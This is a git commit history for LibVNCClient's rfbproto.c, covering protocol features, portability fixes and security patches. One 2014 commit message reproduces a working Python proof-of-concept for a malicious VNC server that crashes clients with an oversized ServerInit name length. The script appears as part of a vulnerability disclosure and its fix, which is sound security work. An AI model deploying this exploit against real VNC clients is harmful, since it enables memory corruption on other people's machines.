path: root/libvncclient/rfbproto.c
Commit message [Author, Age, Files, Lines]
* LibVNCClient: ignore server-sent reason strings longer than 1MB [Christian Beier, 2018-12-29, 1, -24/+21]
|   Fixes #273
* LibVNCClient: ignore server-sent cut text longer than 1MB [Christian Beier, 2018-12-29, 1, -0/+5]
|   This is in line with how LibVNCServer does it (28afb6c537dc82ba04d5f245b15ca7205c6dbb9c) and fixes part of #273.
* Merge pull request #263 from veyon/custom-auth-handlers [Christian Beier, 2018-11-18, 1, -0/+29]
|\    LibVNCClient: add support for custom auth handlers
| * LibVNCClient: add support for custom auth handlers [Tobias Junghans, 2018-11-11, 1, -0/+29]
| |   This allows to register custom authentication handlers in order to support additional security types.
* | Merge pull request #261 from veyon/misc-fixes [Christian Beier, 2018-11-07, 1, -0/+1]
|\ \    Misc fixes
| * | LibVNCClient: init pad field for set encodings msg [Tobias Junghans, 2018-11-06, 1, -0/+1]
| |/
* / common: d3des: drop unused rfbCPKey() [Tobias Junghans, 2018-11-07, 1, -1/+0]
|/
* LibVNCClient: fix three possible heap buffer overflows [Christian Beier, 2018-09-29, 1, -4/+6]
|   An attacker could feed `0xffffffff`, causing a `malloc(0)` for the buffers which are subsequently written to.
|
|   Closes #247
* LibVNCClient: fix possible infinite loop [Christian Beier, 2018-09-29, 1, -1/+1]
|   Closes #251
* LibVNCClient: don't leak uninitialised memory to remote [Christian Beier, 2018-09-29, 1, -0/+2]
|   The pad fields of the rfbClientCutTextMsg and rfbKeyEventMsg could contain arbitrary memory belonging to the process, don't leak this to the remote.
|
|   Closes #252
* When connecting to a repeater, only send initialised string [Christian Beier, 2018-09-29, 1, -2/+6]
|   Closes #253
* Merge pull request #203 from dcommander/turbovnc-client [Christian Beier, 2018-01-23, 1, -13/+0]
|\    Include Tight decoding optimizations from TurboVNC
| * Include Tight decoding optimizations from TurboVNC [DRC, 2018-01-22, 1, -13/+0]
| |   - As with the encoder, the decoder now uses the TurboJPEG wrapper, which allows it to decode JPEG images directly into the framebuffer. This eliminates a buffer copy (CopyRectangle()) as well as the expensive RGB pixel conversion in DecompressJpegRectBPP(). The TurboJPEG wrapper performs RGB pixel conversion more optimally, and only when necessary (it uses the libjpeg-turbo colorspace extensions when available, in order to avoid RGB conversion.)
| |
| |   - The other Tight subencoding types are also now decoded directly into the framebuffer, which eliminates buffer copies.
| |
| |   - The Tight decoder now supports the rfbTightNoZlib extension, which allows the server to bypass zlib compression when Compression Level 0 is selected. The encoder already supports this extension. Passing the data stream through zlib when Compression Level 0 is selected needlessly wastes CPU time, since all zlib is doing is copying the data internally into its own structures.
* | Add trle decoder [Wiki Wang, 2017-09-15, 1, -0/+63]
|/
* libvncclient: rename rfbsasl.[c|h] to sasl.[c|h] to be in line with naming of other files [Christian Beier, 2017-09-02, 1, -1/+1]
* Move HAVE_SASL #ifdefs into header file to have less LOC [Christian Beier, 2017-09-02, 1, -3/+0]
|
* Added SASL authentication support [simon, 2017-06-25, 1, -0/+26]
|   Added SASL support to OpenSSL
* Add function pointers for every type of rectangle [Balazs Ludmany, 2016-06-29, 1, -103/+3]
|
* Merge pull request #110 from AlexejStukov/patch-1 [Christian Beier, 2016-04-12, 1, -1/+2]
|\    break statement out of case
| * break statement out of case [Norrec, 2016-04-07, 1, -1/+2]
| |
* | Fix buffer overflow when applying client encodings [zbierak, 2016-04-12, 1, -1/+2]
|/
* Ignore null pointers in FillRectangle() and CopyRectangleFromRectangle() [SpaceOne, 2016-01-27, 1, -0/+8]
|
* Re-add the useful bits of 9aa9ac59b4cb10bfca93456a3098e348de172d7f. [Christian Beier, 2015-04-17, 1, -0/+4]
|
* Revert "LibVNCClient: Add H.264 encoding for framebuffer updates" [Christian Beier, 2015-04-17, 1, -24/+0]
|   This reverts commit d891478ec985660c03f95cffda0e6a1ad4ba350c.
|
|   Conflicts:
|       configure.ac
|       libvncclient/h264.c
* Merge pull request #69 from nopdotcom/master [Christian Beier, 2015-04-17, 1, -1/+4]
|\    Avoid divide-by-zero in raw encoding (OSX RealVNC)
| * Avoid divide-by-zero in raw encoding (OSX RealVNC) [Jay Carlson, 2015-03-27, 1, -1/+4]
| |   OS X RealVNC server crashes out Remmina because the server can provoke bytesPerLine to be zero. Assume this is coding for zero lines.
| |
| |   The condition could be checked before the calculation of bytesPerLine. I don’t understand the preconditions of this code to say one way or the other.
* | Initialize libgcrypt before use [Floris Bos, 2015-01-02, 1, -0/+10]
|/    https://www.gnupg.org/documentation/manuals/gcrypt/Initializing-the-library.html
|     "Before the library can be used, it must initialize itself. This is achieved by invoking the function gcry_check_version"
|
|     Closes issue #45
|
|     Tested with krdc + libgcrypt 1.6.1 (libgcrypt20-dev Ubuntu package) connecting to a Mac Mini.
|
|     Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* Fix possible libvncclient ServerInit memory corruption. [Christian Beier, 2014-10-10, 1, -1/+2]
|   This fixes the following oCERT report (oCERT-2014-008 pt.2):
|
|   There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client.
|
|   Field           Size
|   ---------------------------------
|   name-length     [4]
|   name-string     [name-length]
|
|   Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc.
|
|   I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd.
|
|   Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably.
|
|   import socket,struct,sys
|   HOST = ""
|   PORT = 5900
|   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|   c.bind((HOST,PORT))
|   c.listen(1)
|   conn,addr = c.accept()
|   print "Connected by ", addr
|   protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
|   conn.send(protocolVersion3008)
|   data = conn.recv(1024) # Receive the version from them.
|   secTypeNone = "\x01\x01"
|   secTypeAuth = "\x01\x02"
|   conn.send(secTypeNone)
|   data = conn.recv(1024) # Receive the secType choice from them.
|   secResultOk = "\x00" * 4
|   secResultNo = "\x00\x00\x00\x01"
|   conn.send(secResultOk)
|   data = conn.recv(1024) # Receive the ClientInit (Shared-flag).
|
|   frameBufferWidth = 0x0480
|   frameBufferHeight = 0x0360
|   bitsPerPixel = 0x20
|   depth = 0x18
|   bigEndian = 0x1
|   trueColor = 0x0
|   redM = 0x0
|   greenM = 0x0
|   blueM = 0x0
|   redS = 0x0
|   greenS = 0x0
|   blueS = 0x0
|   padding = "\x00\x00\x00"
|   nameLength = 0xffffffff
|   nameString = "AA" * 0xFFFF + "\x00\x0a"
|   conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString )
|   c.close()
* `strings.h` and `resolv.h` are not available on MSVC, and some POSIX functions are renamed or deprecated [Daniel Cohen Gindi, 2014-09-20, 1, -1/+6]
|   For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* MSVC: Use _snprintf instead of snprintf [Daniel Cohen Gindi, 2014-09-02, 1, -0/+4]
|   In Microsoft's Visual C runtime, the snprintf() function is actually called _snprintf. Let's just #define the former to call the latter.
|
|   [JES: fixed commit message]
|
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix indentation [Johannes Schindelin, 2014-08-16, 1, -2/+2]
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Check for MallocFrameBuffer() return value [newsoft, 2014-08-15, 1, -3/+7]
|   If MallocFrameBuffer() returns FALSE, frame buffer pointer is left to NULL. Subsequent writes into that buffer could lead to memory corruption, or even arbitrary code execution.
* Initialize padding in SetFormatAndEncodings' rfbSetPixelFormatMsg. [Matthias Treydte, 2014-06-23, 1, -0/+2]
|
* libvncclient: If we have TLS support, enable VeNCrypt by default [Johannes Schindelin, 2014-04-05, 1, -0/+3]
|   Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* LibVNCClient: Add H.264 encoding for framebuffer updates [David Verbeiren, 2013-01-25, 1, -0/+24]
|   This patch implements support in LibVNCClient for framebuffer updates encoded as H.264 frames. Hardware accelerated decoding is performed using VA API.
|
|   This is experimental support to let the community explore the possibilities offered by the potential bandwidth and latency reductions that H.264 encoding allows. This may be particularly useful for use cases such as online gaming, hosted desktops, hosted set top boxes...
|
|   This patch only provides the client side support and is meant to be used with corresponding server-side support, as provided by an upcoming patch for qemu ui/vnc module (to view the display of a virtual machine executing under QEMU).
|
|   With this H.264-based encoding, if multiple framebuffer update messages are generated for a single server framebuffer modification, the H.264 frame data is sent only with the first update message. Subsequent update framebuffer messages will contain only the coordinates and size of the additional updated regions.
|
|   Instructions/Requirements:
|   * The patch should be applied on top of the previous patch I submitted with minor enhancements to the gtkvncviewer application: http://sourceforge.net/mailarchive/message.php?msg_id=30323804
|   * Currently only works with libva 1.0: use branch "v1.0-branch" for libva and intel-driver. Those can be built as follows:
|       cd libva
|       git checkout v1.0-branch
|       ./autogen.sh
|       make
|       sudo make install
|       cd ..
|       git clone git://anongit.freedesktop.org/vaapi/intel-driver
|       cd intel-driver
|       git checkout v1.0-branch
|       ./autogen.sh
|       make
|       sudo make install
|
|   Signed-off-by: David Verbeiren <david.verbeiren@intel.com>
* Include strings.h for strncasecmp(3) [Raphael Kubo da Costa, 2012-09-14, 1, -0/+1]
|
* Tune the definitions needed when building with -ansi. [Raphael Kubo da Costa, 2012-09-14, 1, -0/+1]
|   The current definitions were mostly useful to glibc and followed its feature_test_macros(3) documentation.
|
|   However, this means other platforms still had problems when building with strict compilation flags. _BSD_SOURCE, for example, is only recognized by glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the removal of some definitions (such as the outdated _POSIX_SOURCE one).
|
|   _POSIX_SOURCE also had to be conditionally defined in some places, as what it enables or disables during compilation varies across systems.
* Fix some compiler warnings that hinted some not too unimportant errors. [Christian Beier, 2012-05-09, 1, -2/+2]
|
* LibVNCClient: #undef these types in case it's WIN32. [Christian Beier, 2012-05-03, 1, -4/+4]
|   The various other headers include windows.h and the winsock headers which give an error when SOCKET and socklen_t are already defined.
* Added support for UltraVNC Single Click as originally proposed by Noobius (Boobius) on 6/1/11. [Monkey, 2012-04-23, 1, -0/+8]
|   Original thread: http://sourceforge.net/tracker/?func=detail&aid=3310255&group_id=32584&atid=405860
* LibVNCClient: Remove all those WITH_CLIENT_TLS #ifdefs and move GnuTLS specific functionality into tls_gnutls.c. [Christian Beier, 2012-04-15, 1, -12/+1]
* When GetCredential() callback is not set, don't use authentications requiring it. [Christian Beier, 2011-11-09, 1, -2/+2]
|   The auth methods that employ Getcredential() will only be used if the client's GetCredential callback is actually set.
* Remove useless comparisons that always evaluate to false. [Christian Beier, 2011-03-17, 1, -6/+1]
|   There can not be more than 255 security types and MSLogon is RFB 3.6 only.
* Fix (most) MinGW32 compiler warnings. [Christian Beier, 2011-03-17, 1, -0/+2]
|
* Let libvncclient build with gcrypt for MinGW32 builds. [Christian Beier, 2011-03-12, 1, -0/+4]
|   Signed-off-by: Christian Beier <dontmind@freeshell.org>
* Add ARD (Apple Remote Desktop) security type support [Vic Lee, 2011-01-31, 1, -0/+216]
|   Signed-off-by: Vic Lee <llyzs@163.com>
|   Signed-off-by: Christian Beier <dontmind@freeshell.org>
* Put files used by both libs into a 'common' dir. [Christian Beier, 2011-01-25, 1, -2/+2]
|   No functional changes. All files used by _both_ libvncserver and libvncclient are put into a 'common' directory and references from other files as well as Autotools and CMake build systems are updated.
|
|   Signed-off-by: Christian Beier <dontmind@freeshell.org>
* libvnc[server|client]: implement xvp VNC extension. [Christian Beier, 2010-11-02, 1, -0/+52]
|   This implements the xvp VNC extension, which is described in the community version of the RFB protocol: http://tigervnc.sourceforge.net/cgi-bin/rfbproto
|
|   It is also mentioned in the official RFB protocol.
* Only define strncasecmp to _strnicmp when using MS compiler. [Christian Beier, 2010-10-21, 1, -5/+1]
|   Redefining strncasecmp to _strnicmp makes libvncclient hang forever in SetFormatAndEncodings() on Windows when built with MinGW64.
|
|   Reported by Tobias Doerffel <tobias.doerffel@gmail.com>, thanks!
* IP QoS support in libvncclient. [Christian Beier, 2010-09-29, 1, -0/+3]
|   This enables setting the DSCP/Traffic Class field of IP/IPv6 packets sent by a client. For example starting a client with -qosdscp 184 marks all outgoing traffic for expedited forwarding.
|
|   Implementation for Win32 is still a TODO, though. See http://betelco.blogspot.com/2009/03/dscp-marking-under-windows-at.html for an overview of the Win32 QoS API mess...